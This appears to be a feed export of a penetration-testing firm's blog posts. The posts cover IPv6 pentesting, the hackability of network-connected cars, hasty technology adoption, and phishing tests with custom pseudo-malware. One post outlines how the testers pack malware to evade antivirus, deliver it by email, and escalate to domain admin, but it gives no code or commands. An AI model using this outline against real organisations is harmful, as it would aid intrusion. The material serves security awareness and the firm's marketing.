class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-54367890735317533512011-01-14T20:44:00.001-08:002011-01-14T20:44:04.991-08:00Pentesting IPv6 vs IPv4<div class='posterous_autopost'><p><span style="font-family: Lucida Grande, Arial, Helvetica, sans-serif; font-size: 16px; color: #cccccc; line-height: 26px;"> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;">We’ve heard a bit of “noise” about how IPv6 may impact network penetration testing and how networks may or may not be more secure because of IPv6. Lets be clear, anyone telling you that IPv6 makes penetration testing harder doesn’t understand the first thing about real penetration testing.</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;"><strong style="font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px; margin: 0px;">Whats the point of IPv6?</strong></span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;">IPv6 was designed by the <a href="http://www.ietf.org/" title="IETF" target="_blank" style="font-size: 16px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">Internet Engineering Task Force (“IETF”)</a> to address the issue of IPv4 address space exhaustion. IPv6 uses a 128-bit address space while IPv4 is only 32 bits. This means that there are 2<sup style="padding: 0px; margin: 0px;">128 </sup>possible addresses with IPv6, which is far more than the 2<sup style="padding: 0px; margin: 0px;">32</sup>addresses available with IPv4. This means that there are going to be many more potential targets for a penetration tester to focus on when IPv6 becomes the norm.</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;"><strong style="font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px; margin: 0px;">What about increased security with IPv6?</strong></span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;">The IPv6 specification mandates support for the <a href="http://www.ietf.org/" title="IPSec Wikipedia" target="_blank" style="font-size: 16px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">Internet Protocol Security (“IPSec”)</a> protocol suite, which is designed to secure IP communications by authenticating and encrypting each IP Packet. IPSec operates at the Internet Layer of the Internet Protocol suite and so differs from other security systems like the <a href="http://en.wikipedia.org/wiki/SSL" style="font-size: 16px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">Secure Socket Layer</a>, which operates at the application layer. This is the only significant security enhancement that IPv6 brings to the table and even this has little to no impact on penetration testing.</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;"><strong style="font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px; margin: 0px;">What some penetration testers are saying about IPv6.</strong></span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;">Some penetration testers argue that IPv6 will make the job of a penetration testing more difficult because of the massive increase in potential targets. They claim that the massive increase in potential targets will make the process of discovering live targets impossibly time consuming. They argue that scanning each port/host in an entire IPv6 range could take as long as 13,800,523,054,961,500,000 years. But why the hell would anyone waste their time testing potential targets when they could be testing actual live targets?</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="vertical-align: baseline; background-color: transparent; color: #888888; font-size: medium; padding: 0px; margin: 0px;">The very first step in any <a href="http://www.netragard.com/" style="font-size: 16px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">penetration test</a> is effective and efficient reconnaissance. Reconnaissance is the military term for the passive gathering of intelligence about an enemy prior to attacking an enemy. There are countless ways to perform reconnaissance, all of which must be adapted to the particular engagement. Failure to adapt will result bad intelligence as no two targets are exactly identical.</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;">A small component of reconnaissance is target identification. Target identification may or may not be done with scanning depending on the nature of the <a href="http://www.netragard.com/" style="font-size: 16px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">penetration test</a>. Specifically, it is impossible to deliver a true stealth / covert <a href="http://www.netragard.com/" style="font-size: 16px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">penetration test</a> with automated scanners. Likewise it is very difficult to use a scanner to accuratley identify targets in a network that is protected by reactive security systems (like a well configured IPS that supports black-listing). So in some/many cases doing discovery by scanning an entire block of addresses is ineffective.</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;">A few common methods for target identification include Social Engineering, DNS enumeration, or maybe something as simple as asking the client to provide you with a list of targets. Not so common methods involve more aggressive social reconnaissance, continued reconnaissance after initial penetration, etc. Either way, it will not take 13,800,523,054,961,500,000 years to identify all of the live and accessible targets in an IPv6 network if you know what you are doing.</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;">Additionally, penetration testing against 12 targets in an IPv6 network will take the same amount of time as testing 12 targets in an IPv4 network. The number of real targets is what is important and not the number of potential targets. It would be a ridiculous waste of time to test 2<sup style="vertical-align: super; font-size: 13.3333px; padding: 0px; margin: 0px;">128 </sup>IPv6 Addresses when only 12 IP addresses are live. Not to mention that increase in time would likely translate to an increase in project cost.</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: transparent; padding: 0px;"><span style="color: #888888; font-size: medium;">So in reality, for those who are interested, hacking an IPv6 network won’t be any more or less difficult than hacking an IPv4 network. Anyone that argues otherwise either doesn’t know what they are doing or they are looking to charge you more money for roughly the same amount of work.</span></p> </span></p></div><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-82389236405331363452011-01-07T16:05:00.001-08:002011-01-07T16:05:00.172-08:00Hacking your car for fun and profit.<div class='posterous_autopost'><p> <p>Our CEO (Adriel Desautels) recently spoke at the <a href="http://www.ghs.com/" target="_blank">Green Hills Software</a> Elite Users Technology Summit regarding automotive hacking. During his presentation there were a series of reporters taking photographs, recording audio, etc. Of all of the articles that came out, one in particular caught our eye. We made the front page of “Elektronik iNorden” which is a Swiss technology magazine that focuses on hardware and embedded systems. You can see the full article here but you’ll probably want to translate:</p> <p><a href="http://www.webbkampanj.com/ein/1011/?page=1&mode=50&noConflict=1" target="_blank">http://www.webbkampanj.com/ein/1011/?page=1&mode=50&noConflict=1</a></p> <p><img class="aligncenter" title="Adriel Desautels" src="http://www.netragard.com/images/atd.png" height="217" alt="" width="262" /></p> <p><span style="color: #ffffff;"> </span></p> <p>What really surprised us during the presentation was how many people were in disbelief about the level of risk associated with cars built after 2007. For example, it really isn’t all that hard to program a car to kill the driver. In fact, its far too easy due to the overall lack of security cars today.</p> <p>Think of a car as an IT Infrastructure. All of the servers in the infrastructure are critical systems that control things like breaks, seat belts, door locks, engine timing, airbags, lights, the radio, the dashboard display, etc. Instead of these systems being plugged into a switched network they are plugged into a hub network lacking any segmentation with no security to speak of. The only real difference between the car network and your business network is that the car doesn’t have an internet connection.</p> <p><a href="http://techcrunch.com/2010/11/01/the-chevy-volt-electric-gm-ib/" target="_blank">Enter the Chevrolet Volt, the first car to have its own IP address.</a> Granted we don’t yet know how the Volt’s IP address will be protected. We don’t know if each car will have a public IP address or if the cars will be connected to a private network controlled by Chevy (or someone else). What we do know is that the car will be able to reach out to the internet and so it will be vulnerable to <a href="http://www.honeynet.org/node/157" target="_blank">client side attacks</a>.</p> <p>So what happens if someone is able to attack the car?</p> <p>Realistically if someone is able to hack into the car then they will be able to take full control over almost any component of the car. They can do anything from apply the breaks, accelerate the car, prevent the brakes from applying, kill (literally destroy) the engine, apply the breaks to one side of the car, lock the doors, pretension the seat belts, etc. For those of you that think this is Science Fiction, it isn’t. <a href="http://www.autosec.org/pubs/cars-oakland2010.pdf" title="Computer scientists at the University of Washington and University of California" target="_blank">Here’s one of many research papers that demonstrates the risks. </a></p> <p>Why is this possible?</p> <p>This is possible because people adopt technology too quickly and don’t stop to think about the risks but instead are blinded by the continence that it introduces. We see this in all industries not just automotive. IT managers, CIO’s, CSO’s, CEO’s, etc. are always purchasing and deploying new technologies without really evaluating the risks. In fact just recently we had a client purchase a “secure email gateway” technology… it wasn’t too secure. We were able to hack it and access every email on the system because it relied on outdated third party software.</p> <p>Certainly another component that adds to this is that most software developers write vulnerable and buggy code (sorry guys but its true). Their code isn’t written to be secure, its written to do a specific thing like handle network traffic, beep your horn, send emails, whatever. Poor code + a lack of security awareness == high risks.</p> <p>So what can you do ?</p> <p>Before you decide to adopt new technology make sure that you understand the benefits and the risks associated with the adoption. If you’re not technical enough (most people aren’t) to do a low-level security evaluation then <a href="http://www.netragard.com" target="_blank">hire someone</a> (a security researcher) to do it for you. If you don’t then you could very well be putting yourselves and your customers at serious risk.</p> </p></div><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com3tag:blogger.com,1999:blog-422477430134849438.post-62830023771450373772010-12-02T13:57:00.001-08:002010-12-02T17:40:39.435-08:00Untitled<div class="posterous_autopost"><p><span style=" line-height: 22px;font-family:Lucida Grande, Arial, Helvetica, sans-serif;color:#cccccc;"> </span></p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; vertical-align: baseline; background- padding: 0px;font-size:13px;color:transparent;"><span class="Apple-style-span" style="color:#FFFFFF;">I recently participated in a panel at the BASC conference that was held at the Microsoft New England Research & Development (NERD) building at One Memorial Drive in Cambridge. One of the questions that surfaced inspired me to write this article.</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; vertical-align: baseline; background- padding: 0px;font-size:13px;color:transparent;"><span class="Apple-style-span" style="color:#FFFFFF;">While there are more security solutions available today than ever before, are we actually becoming more secure or is the gap growing? The short answer is yes. The security industry is reactive in that it can only respond to threats but it cannot predict them. This is because of threats are defined by malicious hackers and technology savvy criminals and not the security industry. Antivirus technology for example, was created as a response to viruses that were being written by hackers. So yes, security is getting better, technologies are advancing, and the gap is still growing rapidly. One major part of the problem is that people adopt new technologies too quickly. They don’t stop to question those technologies from the perspective a hacker…</span></p> <p size="13px" color="transparent" style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; vertical-align: baseline; background- text-align: center; padding: 0px;"><img class="aligncenter" title="Inconvenience Store" src="http://www.cartoonstock.com/newscartoons/cartoonists/msi/lowres/msin62l.jpg" height="400" alt="" style="margin-top: 0px; margin-right: auto; margin-bottom: 0px; margin-left: auto; font-size: 13px; vertical-align: baseline; background-color: transparent; display: block; padding: 0px;" width="383" /></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; vertical-align: baseline; background- padding: 0px;font-size:13px;color:transparent;"><span class="Apple-style-span" style="color:#FFFFFF;">A prime example of this problem is clearly demonstrated within the automotive industry. Computer systems that are in automobiles were not designed to withstand any sort of real hacker threat. This wasn’t much of a problem at first because automotive computer systems weren’t Internet connected and at first they didn’t have direct control over things like breaks and the accelerator. That all changed as the automotive industry advanced and as people wanted the convenience that computer technology could bring to the table. Now automotive computer systems directly control critical automotive functions and a hacker can interface with the computer system and cause potentially catastrophic failures. Despite this the problem wasn’t perceived as particularly high risk because accessing the computer system </span><a href="http://www.csmonitor.com/USA/2010/0813/Scientists-hack-into-cars-computers-control-brakes-engine" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><span class="Apple-style-span" style="color:#FFFFFF;">required physical access</span></a><span class="Apple-style-span" style="color:#FFFFFF;"> to the car (or close proximity for </span><a href="http://blogs.edmunds.com/strategies/2010/08/researchers-show-how-to-hack-tire-pressure-monitoring-system.html" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><span class="Apple-style-span" style="color:#FFFFFF;">TPMS like hacks</span></a><span class="Apple-style-span" style="color:#FFFFFF;">). That is all going to change when the </span><a href="http://www.chevrolet.com/volt/" title="Chevy Volt" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><span class="Apple-style-span" style="color:#FFFFFF;">Chevy Volt</span></a><span class="Apple-style-span" style="color:#FFFFFF;"> hits the streets since the </span><a href="http://www.chevrolet.com/volt/" title="Chevy Volt" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><span class="Apple-style-span" style="color:#FFFFFF;">Chevy Volt</span></a><span class="Apple-style-span" style="color:#FFFFFF;"> actually has its own IP address and is network connected. Is the risk really worth the convenience?</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; vertical-align: baseline; background- padding: 0px;font-size:13px;color:transparent;"><span class="Apple-style-span" style="color:#FFFFFF;">Another good example of how we adopt technology too quickly is demonstrated in critical infrastructure (power, water, communications, etc). Just like the automotive industry critical systems were not initially designed to be plugged into the Internet. These critical systems are the systems that control the water coolant levels in our nuclear power plants or the mixtures of chemicals in water treatment plants, etc. Some of these critical systems were designed in the 1960’s so the concept of the “hacker threat” didn’t exist. Other systems are very modern but even those aren’t designed to be secure as much as they are designed to be functional. Back in the day power plants, water treatment plants, etc. were air-gaped to isolate them from potentially harmful environments. But as the Internet offered more and more convenience the air-gaps that once existed are almost extinct. Now our critical systems connected to the Internet and exposed to real hacker threats; and do they get hacked? </span><a href="http://online.wsj.com/article/SB123914805204099085.html" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><span class="Apple-style-span" style="color:#FFFFFF;">Yes</span></a><span class="Apple-style-span" style="color:#FFFFFF;">. Again, is the risk really worth the convenience?</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; vertical-align: baseline; background- padding: 0px;font-size:13px;color:transparent;"><span class="Apple-style-span" style="color:#FFFFFF;">Of course an example that everyone can relate to is business networks. Business networks are constantly evolving and new technologies are continually being adopted without proper vetting. These technologies often include web applications, security technologies, backup technologies, content management systems, etc. These technologies usually promise to make things easier and thus save time which equates to saving money. For example, the other week we were delivering a </span><a href="http://www.netragard.com/" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><span class="Apple-style-span" style="color:#FFFFFF;">penetration test</span></a><span class="Apple-style-span" style="color:#FFFFFF;"> for a pharmaceutical company. This company had a video conference system setup so that they could speak with remote offices and have “face to face” conversations. They loved the technology because it made for more productive meetings and we loved the technology because it was easy to hack.</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; vertical-align: baseline; background- padding: 0px;font-size:13px;color:transparent;"><span class="Apple-style-span" style="color:#FFFFFF;">Despite the fact that the security industry is evolving at a rapid pace, it can’t keep up with the volume of people that are prematurley adopting new and untested technologies. This adoption causes the gap between good security and security risks to grow. To help close the gap consumers need to start challenging their vendors. They need to ask their vendors to demonstrate the security of their technology and maybe even to make some sort of a guarantee about it. There are some solid companies out there that offer services designed to enhance the security of technology products. Once such company is </span><a href="http://www.veracode.com/" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><span class="Apple-style-span" style="color:#FFFFFF;">Veracode</span></a><span class="Apple-style-span" style="color:#FFFFFF;"> (no affiliation with </span><a href="http://www.netragard.com/" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><span class="Apple-style-span" style="color:#FFFFFF;">Netragard</span></a><span class="Apple-style-span" style="color:#FFFFFF;">).</span></p> <p></p></div><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-71336332287005907882010-11-11T20:59:00.001-08:002010-11-11T20:59:23.271-08:00Fox 25 News Interview<div class='posterous_autopost'><p>Our (Netragard's) founder and president (Adriel Desautels) was recently interviewed by the local news (Fox 25) about car hacking. We thought that we'd write a quick entry and share this with you. Thank you to Fox 25 for doing such a good job with the interview. Note for the AAA guy though, once cars have IP addresses (which is now) hackers won't need to "pull up next to you to hack [your car]" and turning the car off is the least of the problems. Hackers will be able to do it from their location of choice and trust us when we say that "firewalls" don't pose much of a challenge at all. Anyway, enjoy the video and please feel free to comment.</p> <p><a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.myfoxboston.com%2Fdpp%2Fnews%2Fspecial_reports%2Fcould-your-car-be-a-hackers-target-20101111&h=fb114">http://www.myfoxboston.com/dpp/news/special_reports/could-your-car-be-a-hackers-target-20101111</a></p></div><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-7797076694202220222010-09-13T23:08:00.001-07:002010-09-13T23:19:23.166-07:00The Human Vulnerability<div class="posterous_autopost"><p> </p><p style=""></p><p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica"><!--StartFragment--> </p><p class="MsoNormal"><span style=" ;font-family:Georgia;"><span class="Apple-style-span" style="font-size:medium;">It seems to us that one of the biggest threats that businesses face today is socially augmented malware attacks. These attacks have an extremely high degree of success because they target and exploit the human element. Specifically, it doesn't matter how many protective technology layers you have in place if the people that you've hired are putting you at risk, and they are.<o:p></o:p></span></span></p> <p class="MsoNormal"><span class="Apple-style-span" style=" ;font-family:Georgia;"><span class="Apple-style-span" style="font-size:medium;">Case in point, the “here you have” worm that propagates predominantly via e-mail and promises the recipient access to PDF documents or even pornographic material. This specific worm compromised major organizations such as NASA, ABC/Disney, Comcast, Google Coca-Cola, etc. How much money do you think that those companies spend on security technology over a one-year period? How much good did it do at protecting them from the risks introduced by the human element? (Hint: none)</span></span></p> <!--EndFragment--> <p></p><p></p><p style="font-weight: normal; font-style: normal; text-decoration: none;font-family:verdana, sans-serif;font-size:11px;color:#666666;"> <span class="Apple-style-span" style="font-size:medium;"><img src="http://www.netragard.com/images/worms.jpg" height="248" align="middle" alt="" width="250" /></span></p> <p style="font-weight: normal; font-style: normal; text-decoration: none;font-family:verdana, sans-serif;font-size:11px;color:#666666;"><span class="Apple-style-span" style="font-size:medium;"><span class="Apple-style-span" style="font-family:Helvetica;"></span></span></p><span class="Apple-style-span" style="font-family:Helvetica;"><p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica"><span class="Apple-style-span" style="font-size:130%;"><span class="Apple-style-span" style="font-size:16px;"><span class="Apple-style-span" style="font-size:100%;"><span class="Apple-style-span" style="font-size:12px;"><span class="Apple-style-span" style="font-size:medium;"> </span><!--StartFragment--></span></span></span></span></p><span class="Apple-style-span" style="font-size:130%;"><span class="Apple-style-span" style="font-size:100%;"><p class="MsoNormal"><span style=" ;font-family:Georgia;"><span class="Apple-style-span" style="font-size:medium;">Here at <a href="http://www.netragard.com">Netragard</a> we have a unique perspective on the issue of malware attacks because we offer pseudo-malware testing services. Our pseudo-malware module, when activated, authorizes us to test our clients with highly customized, safe, controlled, and homegrown pseudo-malware variants. To the best of our knowledge we are the only <a href="http://www.netragard.com">penetration testing</a> company to offer such a service (and no, we're not talking about the meterpreter).<o:p></o:p></span></span></p> <p class="MsoNormal"><span class="Apple-style-span" style=" ;font-family:Georgia;font-size:medium;">Attack delivery usually involves attaching our pseudo-malware to emails or binding the pseudo-malware to PDF documents or other similar file types. In all cases we make it a point to pack (or crypt) our pseudo-malware so that it doesn't get detected by antivirus technology (see this blog entry on bypassing antivirus). Once the malware is activated, it establishes an encrypted connection back to our offices and provides us with full control over the victim computer. Full control means access to the software and hardware including but not limited to keyboard, mouse, microphone and even the camera. (Sometimes we even deliver our attacks via websites like this one by embedding attacks into links).</span></p> <p class="MsoNormal"><span class="Apple-style-span" style=" ;font-family:Georgia;font-size:medium;">So how easy is it to penetrate a business using pseudo-malware? Well in truth its really easy. Just last month we finished delivering an advanced external penetration test for one of our more secure customers. We began crafting an email that contained our pseudo-malware attachment and accidentally hit the send button without any message content. Within 45 seconds of clicking the send button and sending our otherwise blank email, we had 15 inbound connections from 15 newly infected client computer systems. That means that at least 15 employees tried to open our pseudo-malware attachment despite the fact that the email was blank! Imagine the degree of success that is possible with a well-crafted email?</span></p> <p class="MsoNormal"><span class="Apple-style-span" style=" ;font-family:Georgia;font-size:medium;">One of the computer systems that we were able to compromise was running a service with domain admin privileges. We were able to use that computer system (impersonation attack involved) to create an account for ourselves on the domain (which happened to be the root domain). From there we were able to compromise the client's core infrastructure (switches, firewalls, etc) due to a password file that we found sitting on someone's desktop (thank you for that). Once that was done, there really wasn't much more that we had left to do, it was game over. </span></p> <p class="MsoNormal"><span class="Apple-style-span" style=" ;font-family:Georgia;font-size:medium;">The fact of the matter is that there's nothing new about taking advantage of people that are willing to do stupid things. But is it really stupidity or is it just that employees don't have a sense of accountability? Our experience tells us that in most cases its a lack of accountability that's the culprit.</span></p> <p class="MsoNormal"><span class="Apple-style-span" style=" ;font-family:Georgia;font-size:medium;">When we compromise a customer using pseudo-malware, one of the recommendations that we make to them is that they enforce policies by holding employees accountable for violations. We think that the best way to do that is to require employees to read a well-crafted policy and then to take a quiz based on that policy. When they pass the quiz they should be required to sign a simple agreement that states that they have read the policy, understood the policy, and agree to be held accountable for any violations that they make against the policy. </span></p> <p class="MsoNormal"><span style=" ;font-family:Georgia;"><o:p><span class="Apple-style-span" style="font-size:medium;"> </span></o:p></span></p> <p class="MsoNormal"><span style=" ;font-family:Georgia;"><span class="Apple-style-span" style="font-size:medium;">In our experience there is no better security technology than a paranoid human that is afraid of being held accountable for doing anything irresponsible (aka: violating the policy). When people are held accountable for something like security they tend to change their overall attitude towards anything that might negatively affect it. The result is a significantly reduced attack surface. If all organizations took this strict approach to policy enforcement then worms like the "here you have" worm wouldn't be such a big success.<o:p></o:p></span></span></p> <p class="MsoNormal"><span style=" ;font-family:Georgia;"><o:p><span class="Apple-style-span" style="font-size:medium;"> </span></o:p></span></p> <p class="MsoNormal"><span style=" ;font-family:Georgia;"><span class="Apple-style-span" style="font-size:medium;">Compare the cost and benefit of enforcing a strict and carefully designed security policy to the cost and benefit of expensive (and largely ineffective) security technologies. Which do you think will do a better job at protecting your business from real threats? Its much more difficult to hack a network when that network is managed by people that are held accountable for its security than it is to hack a network that is protected technology alone.<o:p></o:p></span></span></p> <p class="MsoNormal"><span style=" ;font-family:Georgia;"><o:p><span class="Apple-style-span" style="font-size:medium;"> </span></o:p></span></p> <p class="MsoNormal"><span style=" ;font-family:Georgia;"><span class="Apple-style-span" style="font-size:medium;">So in the end there's really nothing special about the "here you have" worm. It’s just another example of how malicious hackers are exploiting the same human vulnerability using an ever so slightly different malware variant. Antivirus technology certainly won’t save you and neither will other expensive technology solutions, but a well-crafted, cost-effective security policy just might do the trick.<o:p></o:p></span></span></p> <p class="MsoNormal"><span style=" ;font-family:Georgia;"><o:p><span class="Apple-style-span" style="font-size:medium;"> </span></o:p></span></p> <p class="MsoNormal"><span style=" ;font-family:Georgia;"><span class="Apple-style-span" style="font-size:medium;">It’s important to remember that well written security policies don’t only impact human behavior, but generally result in better management of systems, which translates to better technological security. The benefits are significant and the overall cost isn’t in comparison. </span></span><span style="font-size:16.0pt;mso-bidi-font-family:Georgia;font-size:12.0pt;"><o:p></o:p></span></p> <!--EndFragment--> </span></span><p></p></span><p></p> <p> </p> <p></p></div><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-43802730698997843452010-08-31T12:46:00.001-07:002010-08-31T12:46:22.669-07:00That nice, new computerized car you just bought could be hackable<div class='posterous_autopost'> <div class="cnet-image-div image-REGULAR float-right" style="font-weight: inherit; font-style: inherit; font-size: 16px; font-family: inherit; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> <p style="font-weight: normal; font-size: 11px; color: #666666; font-style: normal; font-family: verdana, sans-serif; text-decoration: none;"> </p> <table border="0" align="left"> <tr> <td> </td> <td><br /></td> </tr> <tr> <td colspan="2"> <p style="font-weight: normal; font-size: 11px; color: #666666; font-style: normal; font-family: verdana, sans-serif; text-decoration: none;"><strong>Link: </strong><a href="http://news.cnet.com/8301-27080_3-20015184-245.html" style="font-size: 11px; color: #ff6600; font-style: normal; font-family: verdana, sans-serif; text-decoration: none;">http://news.cnet.com/8301-27080_3-20015184-245.html</a></p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">Of course, your car is probably not a high-priority target for most malicious hackers. But security experts tell CNET that car hacking is starting to move from the realm of the theoretical to reality, thanks to new wireless technologies and evermore dependence on computers to make cars safer, more energy efficient, and modern.</p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"> </p> <p style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">"Now there are computerized systems and they have control over critical components of cars like gas, brakes, etc.," said Adriel Desautels, chief technology officer and president of <a href="http://www.netragard.com/" style="font-size: 16px; color: #0066a0; font-style: inherit; font-family: inherit; text-decoration: none; font-weight: inherit; text-align: left; vertical-align: baseline; cursor: pointer; padding: 0px; margin: 0px;">Netragard</a>, which does vulnerability assessments and penetration testing on all kinds of systems. "There is a premature reliance on technology."</p> </td> </tr> <tr> <td colspan="2"> <p /> <table border="0" width="400"> <tr> <td> <p style="font-weight: normal; font-size: 11px; color: #666666; font-style: normal; font-family: verdana, sans-serif; text-decoration: none;"> </p> <p style="font-weight: normal; font-size: 11px; color: #666666; font-style: normal; font-family: verdana, sans-serif; text-decoration: none;"> </p> <p class="image-caption" style="font-weight: inherit; font-size: 16px; color: #666666; font-style: inherit; font-family: inherit; text-decoration: none; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"><span style="font-size: small;">Illustration for a tire pressure monitoring system, with four antennas, from a report detailing how researchers were able to hack the wireless system.</span></p> <span style="font-size: small;"><span class="image-credit" style="font-weight: inherit; font-style: inherit; font-family: inherit; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;">(Credit: </span></span><span class="image-credit" style="font-weight: inherit; font-style: inherit; font-size: 16px; font-family: inherit; text-align: left; vertical-align: baseline; padding: 0px; margin: 0px;"><a href="http://www.winlab.rutgers.edu/~Gruteser/papers/xu_tpms10.pdf" style="font-size: 11px; color: #ff6600; font-style: normal; font-family: verdana, sans-serif; text-decoration: none;"><span style="font-size: small;">University of South Carolina, Rutgers University (PDF)</span></a></span><span style="font-size: small;"><span class="image-credit" style="border-color: initial; font-weight: inherit; font-style: inherit; font-family: inherit; text-align: left; vertical-align: baseline; border-width: 0px; padding: 0px; margin: 0px;">) </span></span> <p style="font-weight: normal; font-size: 11px; color: #666666; font-style: normal; font-family: verdana, sans-serif; text-decoration: none;"> </p> </td> <td><img class="cnet-image" src="http://i.i.com.com/cnwk.1d/i/tim//2010/08/31/TirePressureMonitoring_2.png" height="233" alt="" style="font-weight: inherit; 